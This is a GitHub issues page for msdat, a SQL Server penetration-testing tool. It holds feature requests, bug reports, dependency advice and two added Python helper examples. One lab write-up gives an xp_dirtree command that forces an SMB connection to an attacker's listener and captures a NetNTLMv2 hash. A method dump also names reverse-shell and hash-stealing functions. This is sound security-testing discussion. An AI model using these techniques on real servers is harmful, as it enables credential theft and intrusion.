quentinhardy / msdat
MSDAT: Microsoft SQL Database Attacking Tool
What format of wordlist does passwordguesser accept? In the example: sa/sa. What does it mean? Thanks.
My team uses msdat non-interactively against a ton of machines using GNU's parallel command. It'd be nice if the xp_cmdshell module supported running a specific user-provided command such as whoami rather than prompting for an interactive session/command. Both options WOULD be nice to have. Having this feature would allow us to more easily test plenty of MSSQL servers rather than running one at a time.
Hi, I am working through the HackTheBox machine, Escape, and I found that xp_dirtree was incorrectly reported as not supported.
I used impacket-mssqlclient and DBeaver to run exec xp_dirtree '\\#.#.#.#\share', which successfully connected to my Responder instance, providing a NetNTLMv2 hash. The user I am using holds public access only.
Looking at the verbose comments, my guess is that this particular box does not have a C:\. I'll continue working and see if this box has a C:\ later on. What I find interesting is that the result was an empty list [], not a SQL error. I am no expert at SQL, but could we modify the xpdirectory module to check if [] was returned and not a SQL error?
My team uses msdat non-interactively against a ton of machines using GNU's parallel command. We like to check and see if xp_cmdshell can be executed. Currently xp_cmdshell allows the user to enable or disable the xp. However, I'd like to be able to restore xp_cmdshell to how we found it, so that I am not leaving xp_cmdshell enabled if it was already disabled on client environments.
So the breakdown would be:
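A record-and-restore guard of the kind requested above, as an added example that is not msdat's own code. It assumes a DB-API style cursor such as pymssql's (the FakeCursor is a constructed stand-in so the example runs offline) and uses SQL Server's documented sp_configure/RECONFIGURE semantics, including the fact that xp_cmdshell is an advanced option that sp_configure only shows while show advanced options is 1, so that flag is preserved as well. The names preserve_option, preserve_advanced_option, set_option, read_option and demo are the example's own.

```python
"""Record-and-restore guard for SQL Server sp_configure options (added example)."""
import re
from contextlib import contextmanager

# Advanced options are only visible to sp_configure while 'show advanced options' = 1.
ADVANCED = {"xp_cmdshell", "Ole Automation Procedures", "Ad Hoc Distributed Queries"}
_NAME_OK = re.compile(r"^[A-Za-z0-9 _]+$")   # sp_configure option names are plain words


def _checked(name):
    """Reject anything that is not a plain option name before it reaches T-SQL."""
    if not _NAME_OK.match(name):
        raise ValueError("suspicious option name: %r" % name)
    return name


def read_option(cursor, name):
    """Return (config_value, run_value) of one option via EXEC sp_configure @configname."""
    cursor.execute("EXEC sp_configure %s", (_checked(name),))
    row = cursor.fetchone()   # columns: name, minimum, maximum, config_value, run_value
    return int(row[3]), int(row[4])


def set_option(cursor, name, value):
    """Set an option and apply it; xp_cmdshell is dynamic, so RECONFIGURE takes effect at once."""
    cursor.execute("EXEC sp_configure %s, %d", (_checked(name), int(value)))
    cursor.execute("RECONFIGURE")


@contextmanager
def preserve_option(cursor, name):
    """Yield the run value found on entry and put it back on exit if anything changed it."""
    found = read_option(cursor, name)[1]
    try:
        yield found
    finally:
        if read_option(cursor, name)[1] != found:
            set_option(cursor, name, found)


@contextmanager
def preserve_advanced_option(cursor, name):
    """Same guard for an advanced option; exposes it first and restores the exposure flag too.
    The inner guard restores the option while advanced options are still visible,
    then the outer guard restores 'show advanced options' itself."""
    with preserve_option(cursor, "show advanced options") as shown:
        if shown != 1:
            set_option(cursor, "show advanced options", 1)
        with preserve_option(cursor, name) as found:
            yield found


class FakeCursor:
    """Constructed stand-in for a pymssql cursor (example only, no network)."""

    def __init__(self, options):
        self.options = {k: [v, v] for k, v in options.items()}  # name -> [config_value, run_value]
        self.log = []
        self._row = None

    def execute(self, sql, params=()):
        # pymssql substitutes %s/%d client side; emulate that for the two shapes used above.
        stmt = sql % tuple("'%s'" % p if isinstance(p, str) else p for p in params) if params else sql
        self.log.append(stmt)
        if stmt == "RECONFIGURE":
            for pair in self.options.values():
                pair[1] = pair[0]
            return
        m = re.match(r"^EXEC sp_configure '([^']+)'(?:, (\d+))?$", stmt)
        if m is None:
            raise ValueError("statement not modelled by FakeCursor: " + stmt)
        name, value = m.group(1), m.group(2)
        if name in ADVANCED and self.options["show advanced options"][1] == 0:
            raise RuntimeError("%r does not exist, or it may be an advanced option" % name)
        if value is None:
            self._row = (name, 0, 1, self.options[name][0], self.options[name][1])
        else:
            self.options[name][0] = int(value)

    def fetchone(self):
        row, self._row = self._row, None
        return row


def demo(show_advanced=0, xp_cmdshell=0):
    """Run a hypothetical xp_cmdshell check inside the guard; report found/during/after states."""
    cur = FakeCursor({"show advanced options": show_advanced, "xp_cmdshell": xp_cmdshell})
    with preserve_advanced_option(cur, "xp_cmdshell") as found:
        if found == 0:
            set_option(cur, "xp_cmdshell", 1)   # the module's check would run here
        during = read_option(cur, "xp_cmdshell")[1]
    after = {name: pair[1] for name, pair in cur.options.items()}
    return found, during, after


if __name__ == "__main__":
    print(demo(0, 0))   # (0, 1, {'show advanced options': 0, 'xp_cmdshell': 0})
```

The restore happens in a finally block, so a failing check still leaves the server as it was found; nesting the guards in this order matters because an advanced option cannot be read or written once show advanced options has been switched back to 0.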
Hi there, could you please help me with this?
root@kali:/Downloads/mssql/msdat# ./msdat.py -h
Traceback (most recent call last):
  File "./msdat.py", line 10, in <module>
    from Mssql import Mssql
  File "/root/Downloads/mssql/msdat/Mssql.py", line 6, in <module>
    import pymssql, _mssql, decimal
ImportError: No module named pymssql
root@kali:/Downloads/mssql/msdat# pip3 install pymssql
Requirement already satisfied: pymssql in /usr/local/lib/python3.8/dist-packages (2.1.5)
I would like the tool to output results to file. Understanding this tool has many different modules, a standardized machine readable file type such as CSV may be difficult. However, having the tool output timestamps of actions and results would allow the tool to be run with persistent results. I see that something was started here, but was commented out:
#PPoutput.add_argument('--output-file',dest='outputFile',default=None,required=False,help='save results in this file')
I have been going through the MSSQL hacking tools in the community and noticed no mention of TLS in this repository. Does it support MSSQL TLS connections?
It would be cool if we added a flag such as -sL to run the intended module(s) against multiple servers at once. I am already wrapping msdat in a Bash script. This would be a line-delimited text file of servers rather than an nmap input file.
I see that multiple hosts are supported for password guessing:
PPpassguesser.add_argument('-l', dest='hostlist', required=False, help='filename which contains hosts (one ip on each line: "ip:port" or "ip" only)')
Hi. In msdat, inappropriate dependency versioning constraints can cause risks.
Below are the dependencies and version constraints that the project is using:
cython
colorlog
termcolor
pymssql
argparse
python-libnmap
argcomplete
The version constraint == will introduce the risk of dependency conflicts because the scope of dependencies is too strict.
The version constraints No Upper Bound and * will introduce the risk of a missing-API error because the latest version of the dependencies may remove some APIs.
After further analysis, in this project,
The version constraint of dependency cython can be changed to ==3.0.0a10.
The version constraint of dependency colorlog can be changed to >=0.1,<=0.4.
The version constraint of dependency colorlog can be changed to >=1.4,<=1.8.
The version constraint of dependency colorlog can be changed to >=6.3.0a1,<=6.6.0.
The version constraint of dependency argparse can be changed to >=1.2.1,<=1.4.0.
The version constraint of dependency argcomplete can be changed to >=0.1.7,<=0.7.1.
The above modification suggestions can reduce the dependency conflicts as much as possible, and introduce the latest versions as much as possible without causing errors in the project.
The current project invokes all of the following methods:
queue.Queue
colorlog.ColoredFormatter
argparse.ArgumentParser argparse.ArgumentParser.parse_args argparse.HelpFormatter argparse.ArgumentParser.add_subparsers
argcomplete.autocomplete
iw.r.update self.__saveThisLoginInFileIfNotExist__ self.args.close Xpcmdshell.testAll functools.reduce next LAST_RUN_OUTCOME.items self.readFile self.useThisDB map productVersion.append self.tryToCaptureASmbAuthentication search.searchInColumnNames.add_rows argparse.ArgumentParser.testAll self.nb.get self.header R_SHELL_COMMAND_POWERSHELL_PAYLOAD.format marked_width.m.rjust socket.socket.connect MssqlInfo.__getRemoteVersionThroughSQLServerBrowser__ TrustworthyPE.testAll os.popen.read.split Jobs.getInteractiveReverseShell self.REQ_EXEC_SYS_CMD.format aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_CREATE.format.replace.replace Search self.captureSMBAuthenticationViaXpDirtree accounts.append pymssql.connect self.fd.write join Passwordstealer self.getUsernamesViaSuserName getHostsFromFile.append self._splitit self.REQ_OPENROWSET_REMOTE_CONNECTION.format ScanPorts.scanAPort socket.inet_aton base64.b64encode re.findall bulkOpen.searchValideAccounts.append self.reset TrustworthyPE.TrustworthyPE.connect BulkOpen.readFileViaOpenRowSet self.REQ_READ_FILE.format BulkOpen.remoteConnectionWithOpenrowset self.__getUsernames__ Jobs.Jobs.testAll Utils.generateUniqueName math.ceil self.writeFileBinary _thread.exit OleAutomation.putFile bytes.fromhex os.walk usern.lower hasattr self.__getAnExampleOfValueForAColumn__ anAccount.startswith threading.Thread.start ports.split.append self.set_chars cells.append self.args.execute data.str.split self.REQ_SMB_AUTHENTICATION_VIA_XP_FILEEXIST.format self.isFileExistViaXpFileexist XpDirectory.listFilesViaXpDirtree logging.getLogger.setLevel signal.signal self.execSP self.waitSomeSecs self._check_align XpDirectory.isFileExistViaXpFileexist datetime.datetime.now.strftime range self.REQ_GET_COLUMNS_IN_TABLES.format argparse.HelpFormatter SMBAuthenticationCapture.captureSMBAuthenticationViaXpGetFileDetails self.update maxvalue.ETA.Bar.Percentage.ProgressBar.start queue.Queue repr UsernameLikePassword.tryUsernameLikePassword 
args.badNews os.path.join BulkOpen.closeConnection isinstance search.searchInColumnNames.draw self.getJobs self._compute_cols_width Search.searchInColumnNames PS_CMD_WRITE_CREATE.format re.compile.match usern.upper self.REQ_USE_THIS_DB.format marked_width.m.ljust Jobs.testAll XpDirectory.closeConnection self.__getRemoteVersionThroughTDSResponse__ ScanPorts.scanAPort.start currentFile.lower.endswith threading.Thread.__init__ argparse.ArgumentParser.parse_args re.compile.sub.extend dict.badNews Jobs.createAndExecuteJob Utils.getStandardBarStarted e.replace argparse.ArgumentParser self._has_border logging.StreamHandler Search.closeConnection NC_CMD.format self.marker.update OleAutomation.OleAutomation OleAutomation.getFile self.stealHashedPasswords self._format_marker BulkOpen.readFileViaBulkinsert strg.replace.replace logging.StreamHandler.setFormatter type self.getCompleteVersion os.popen resultsToTable.append ArraySizeError self._hline XpDirectory.testAll anAccountIsGiven fcntl.ioctl getScreenSize parser.parse_args.func oleAutomation.putFile.encode sorted search.searchInColumnNames.count runBulkInsertForGet self.listDrivesViaXpAvailableMedia datetime.datetime.now runBulkInsertForRead checkOptionsGivenByTheUser BulkOpen Utils.getPSReverseShellCodeEncoded Passwordstealer.printPasswords self.listDirectoriesViaXpSubdirs self._build_hline logging.info Xpcmdshell.uploadFileWithPowershell BulkOpen.searchValideAccounts aRawData.base64.b64encode.decode XpDirectory.createSubDiViaXpCreateSubdir PasswordGuesser.searchValideAccounts self.REQ_EXEC_SP_FOR_PE.format max ValueError self.deleteSP self._rows.append self.__createJob__ self.readFileViaOpenRowSet socket.socket.sendall configureLogging self.REQ_EXEC_JOB.format OleAutomation.readFile threading.Thread UsernameLikePassword argparse.ArgumentParser.add_subparsers strg.replace self.createAndExecuteJob self._has_vlines.join self.remoteConnectionWithOpenrowset main R_SHELL_COMMAND_POWERSHELL.format 
MssqlInfo.returnPrintableStringFromDict Percentage ansi_keep.pop self.__setJob__ self._has_hlines parser.add_subparsers.add_parser self._format_line self.handle_resize self.executeRequest self.allUsernames.append Search.isEmptyTable re.compile.sub Passwordstealer.stealHashedPasswords self.__getJobStatusValue__ cleanString pbar.percentage time.time format Jobs.getJobStatus argcomplete.autocomplete BulkOpen.scanPortsWithOpenrowset Jobs.printJobs self._has_header selectData.append self.executeCmd socket.socket self.args.fetchall Xpcmdshell.Xpcmdshell.testAll struct.pack self.tryPE results.insert self._len_cell Utils.getScreenSize range.append Xpcmdshell.enableXpcmdshell self.REQ_DROP_TABLE.format texttable.Texttable.add_rows getHostsFromFile self.REQ_WRITE_FILE.format OleAutomation.connect enumerate BulkOpen.getFileViaOpenRowSet self.queueLock.acquire self._check_row_size OleAutomation.getInteractiveReverseShell TrustworthyPE.TrustworthyPE os.remove self.OUTPUT_FORMAT_XP_DIRTREE.format aHost.cleanString.split self.VERSIONS.items Passwordstealer.testAll dict.bigTitle self.__getAccounts__ self.nb.get.put BulkOpen.disableAdHocDistributedQueries self.getStandardBarStarted anAccount.hex print self.args.title Passwordstealer.closeConnection self.__dropSysadminPriv__ self.captureSMBAuthenticationViaXpFileexist texttable.Texttable.set_deco self.isThe2005Version pbar.update SMBAuthenticationCapture.SMBAuthenticationCapture strg.replace.replace.replace re.compile Xpcmdshell.closeConnection socket.gethostbyname utf16LEPayloadBytes.base64.b64encode.decode MssqlInfo list self.getJobStatus termcolor.colored array.array subparsers.add_parser.set_defaults Mssql.Mssql R_SHELL_COMMAND_POWERSHELL_PAYLOAD.format.encode sys.exit self.portStatusQueue.put libnmap.parser.NmapParser.parse_fromfile iter runAllModules self.output.printOSCmdOutput PS_CMD_WRITE_APPEND.format Mssql.Mssql.connect Jobs self.REQ_GET_COLUMNS_IN_VIEWS.format values.append self.REQ_XPCMDSHELL_CMD.format open.write 
self.__askToTheUserIfNeedToContinue__ UsernameLikePassword.runUsernameLikePassword zip line_wrapped.append passwords.append self.REQ_BULK_INSERT.format anOperationHasBeenChosen XpDirectory runPasswordGuesserModuleOnAHost Xpcmdshell.connect str Utils.ipOrNameServerHasBeenGiven aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_CREATE.format.replace open connectionInformation.keys os.path.dirname XpDirectory.connect sys.stderr.write Passwordstealer.Passwordstealer.testAll TrustworthyPE.cleanPE self.accounts.append Exception.__init__ float self.disableXpcmdshell Jobs.Jobs w.update OleAutomation Utils.databaseHasBeenGiven OleAutomation.OleAutomation.testAll Xpcmdshell.getInteractiveShell texttable.Texttable self.REQ_WRITE_FILE_BINARY.format self.getRemoteDatabaseVersion len Utils.cleanString Passwordstealer.Passwordstealer self._str dict anAccount.endswith self.REQ_XP_FILEEXIST.format self.__dropTable__ args.title Xpcmdshell.disableXpcmdshell self.enableAdHocDistributedQueries logging.getLogger logging.critical SMBAuthenticationCapture.captureSMBAuthenticationViaXpDirtree SMBAuthenticationCapture.testAll self.readFileViaBulkinsert itertools.zip_longest self.REQ_DROP_PRIV.format OleAutomation.writeFile portsQueue.join int SMBAuthenticationCapture.tryToCaptureASmbAuthentication optik.textwrap.wrap databases.append currentFile.lower Search.connect args.goodNews validAccountsList.items r.append Xpcmdshell.Xpcmdshell time.strftime ProgressBar self.queueLock.release self.__getRemoteVersionThroughSQLServerBrowser__ self.OUTPUT_MEDIA.format self.isThe2012Version open.read self.REQ_STEP_JOB.format input self.disableAdHocDistributedQueries PasswordGuesser.PasswordGuesser.searchValideAccounts self.__searchPatternInColumnNamesOfViews__ SMBAuthenticationCapture SMBAuthenticationCapture.SMBAuthenticationCapture.testAll self.portsQueue.empty input.lower self.__searchPatternInColumnNamesOfTables__ OleAutomation.disableOLEAutomationProcedures XpDirectory.XpDirectory 
validAccounts.append self.nb.put socket.socket.recv self.__createStoredProcToPE__ self.isCurrentUserSysadmin self.format_time self.__getPasswords__ TrustworthyPE.TrustworthyPE.testAll argparse.ArgumentParser.add_argument self.captureSMBAuthenticationViaXpGetFileDetails self.createSubDiViaXpCreateSubdir search.searchInColumnNames.set_deco self._format_widgets XpDirectory.listDrivesViaXpAvailableMedia self.REQ_XP_CREATE_SUBDIR.format self.__addJob__ OleAutomation.closeConnection self.getCurrentUser self.__isFileNotExist__ time.sleep socket.socket.settimeout OleAutomation.testAll self.pbar.update self.isThe2008Version self.scannerObject.remoteConnectionWithOpenrowset ScanPorts.ScanPorts.printScanPortResults self.__execJob__ Utils.getBinaryDataFromFile args.subtitle BulkOpen.BulkOpen.testAll self.REQ_CREATE_TABLE.format runBulkInsertForGet.encode socket.socket.sendto ports.split self.executeSysCmd re.compile.sub.split self.REQ_ADD_JOB.format l.replace.replace.replace self.__loadCompleteVersionIfNeed__ status.str.replace BulkOpen.testAll Xpcmdshell args.unknownNews portsQueue.put l.cleanString.split mssqlRawData.rfind self._splitit.split TrustworthyPE.isCurrentUserSysadmin Utils.putDataToFile self.__delJob__ hfill_inds.append aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_APPEND.format.replace SMBAuthenticationCapture.captureSMBAuthenticationViaXpFileexist self.REQ_GET_VALUE_IN_COLUMN.format self.percentage OleAutomation.executeSysCmd PasswordGuesser.getHostsFromFile self.__loadAllUsernames__ Output.Output self.REQ_SMB_AUTHENTICATION_VIA_XP_GETFILEDETAILS.format self.REQ_CREATE_JOB.format self.add_row open.readlines self._hline_header self.__getTrustworthyDBs__ aService.service.lower Passwordstealer.connect self.enableXpcmdshell open.close XpDirectory.listDrivesViaXpFixedDrives ScanPorts.ScanPorts.scanTcpPorts self._draw_line BulkOpen.BulkOpen.closeConnection threading.Lock BulkOpen.enableAdHocDistributedQueries 
self.REQ_SMB_AUTHENTICATION_VIA_XP_DIRTREE.format self._format_widgets.join.ljust self.args.cursor self.REQ_XP_SUBDIRS.format Bar Utils.checkOptionsGivenByTheUser logging.Formatter self.args.unknownNews OleAutomation.enableOLEAutomationProcedures time.gmtime validUsers.append SMBAuthenticationCapture.connect Utils.getCredentialsFormated Jobs.connect ScanPorts.ScanPorts self.OUTPUT_DRIVES.format self.__createTable__ self._need_update struct.unpack self.__getJobStatus__ database.connectionInformation.append BulkOpen.BulkOpen self.writeFile UsernameLikePassword.connect os.path.isfile os.path.isdir ansi_keep.append self.REQ_XP_DIRTREE.format dict.title self.REQ_STORED_PROC_TO_SYSADMIN.format dict.goodNews logging.debug self.args.badNews MssqlInfo.__getRemoteVersionThroughTDSResponse__ os.path.abspath self.isThe2000Version self.REQ_GET_STATUS.format dict.items self.REQ_OPENROWSET.format ipOrNameServerHasBeenGiven XpDirectory.listDirectoriesViaXpSubdirs BulkOpen.connect certificateBasedSQLServerLogins.append l.replace.replace pbar.finish self.REQ_READ_LINES.format self.cleanPE TrustworthyPE.tryPE ports.isdigit os.mkdir self.isThe2014Version self._has_vlines self.enableOLEAutomationProcedures Utils.cleanString.replace runOpenRowSetForGet self.listDrivesViaXpFixedDrives Utils.ErrorClass self.REQ_IS_A_VALID_USERNAME.format logging.getLogger.addHandler TrustworthyPE.connect TrustworthyPE input.replace ETA parser.parse_args._get_kwargs self.REQ_DEL_PROC.format f.read.encode self.REQ_DEL_JOB.format random.randrange list.extend self.args.autocommit cleanList.append self.args.goodNews aDictionary.items aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_APPEND.format.replace.replace logging.warning self.listFilesViaXpDirtree self.args.subtitle self.portsQueue.get self.__getProductNameFromVersion__ BulkOpen.getFileViaBulkinsert PasswordGuesser self.REQ_GET_USERNAME.format x.encode askToContinue colorlog.ColoredFormatter SMBAuthenticationCapture.closeConnection 
logging.error iterable.__len__ Mssql.Mssql.__init__ runOpenRowSetForRead PasswordGuesser.PasswordGuesser self.portsQueue.task_done os.popen.read Mssql.Mssql.closeConnection Passwordstealer.credentialsAreEmpty texttable.Texttable.draw usernames.append subprocess.call
@developer
Could you please help me check this issue? May I submit a pull request to fix it? Thank you very much.
The documentation fails to mention that you need to do sudo pip install pyodbc
Add a requirements.txt file for easy Python module dependency clarification
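Both the versioning report above and the requirements.txt request can be served by a small audit of requirement specifiers; the following is an added example, not msdat's own code. It uses only the standard library (a simplified reading of PEP 440 specifiers, not the packaging library), and the SAMPLE requirements text is constructed here to resemble the dependency list above, not the project's actual file. The function names parse_requirement, classify and audit_requirements are the example's own.

```python
"""Audit a requirements file for risky version constraints (added example)."""
import re

# name, optional extras, then whatever specifier text follows (simplified PEP 440 grammar)
_REQ = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)(?:\[[^\]]*\])?\s*(.*)$")
_CLAUSE = re.compile(r"^(===|==|!=|~=|<=|>=|<|>)\s*(\S+)$")

# Operators that cap the version range from above. ~= is a compatible release
# (~=1.4 means >=1.4,<2), so it counts as an upper bound.
_UPPER = {"<", "<=", "~=", "==", "==="}

RISK = {
    "unbounded": "no constraint: the newest release is always taken, so a removed API breaks the project",
    "no-upper-bound": "lower bound only: a future major release may remove APIs the project calls",
    "exact": "exact pin: conflicts with any other pin of the same package in one environment",
    "bounded": None,
}


def parse_requirement(line):
    """Return (normalised_name, [(op, version), ...]) or None for lines that name no package."""
    text = line.split("#", 1)[0].split(";", 1)[0].strip()   # drop comments and env markers
    if not text or text.startswith("-"):                      # blank, or -r/-e/--hash option lines
        return None
    m = _REQ.match(text)
    if m is None:
        raise ValueError("unparsable requirement: %r" % line)
    name, spec = m.group(1), m.group(2).strip()
    clauses = []
    if spec and spec != "*":          # a bare "*" means "any version", i.e. no clause at all
        for part in spec.split(","):
            c = _CLAUSE.match(part.strip())
            if c is None:
                raise ValueError("unparsable specifier %r in %r" % (part, line))
            clauses.append((c.group(1), c.group(2)))
    return name.lower().replace("_", "-"), clauses


def classify(clauses):
    """Map a specifier set to one of the four kinds the report above distinguishes."""
    if not clauses:
        return "unbounded"
    ops = {op for op, _ in clauses}
    if ops <= {"==", "==="}:
        return "exact"
    return "bounded" if ops & _UPPER else "no-upper-bound"


def audit_requirements(text):
    """Return [(name, kind, risk_message_or_None)] for every package line in a requirements file."""
    findings = []
    for line in text.splitlines():
        parsed = parse_requirement(line)
        if parsed is None:
            continue
        name, clauses = parsed
        kind = classify(clauses)
        findings.append((name, kind, RISK[kind]))
    return findings


# Constructed sample resembling the dependency list above; not the project's real file.
SAMPLE = """\
# constructed requirements.txt for the example
cython
colorlog>=6.3.0a1,<=6.6.0
termcolor==1.1.0
pymssql>=2.1
argparse>=1.2.1,<=1.4.0
python-libnmap~=0.7
argcomplete *
"""

if __name__ == "__main__":
    for name, kind, risk in audit_requirements(SAMPLE):
        print("%-15s %-15s %s" % (name, kind, risk or "ok"))
```

Run against a real requirements.txt, the "unbounded" and "no-upper-bound" findings are the lines where a future upstream release can silently change what gets installed; the "exact" findings are where the report above expects conflicts with other pins in the same environment.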
Hello, my employer would like to use your code as a part of our penetration tests. Not to distribute, but use. Could you add an appropriate license to allow this OR at least provide a license to clarify your software usage? Thanks!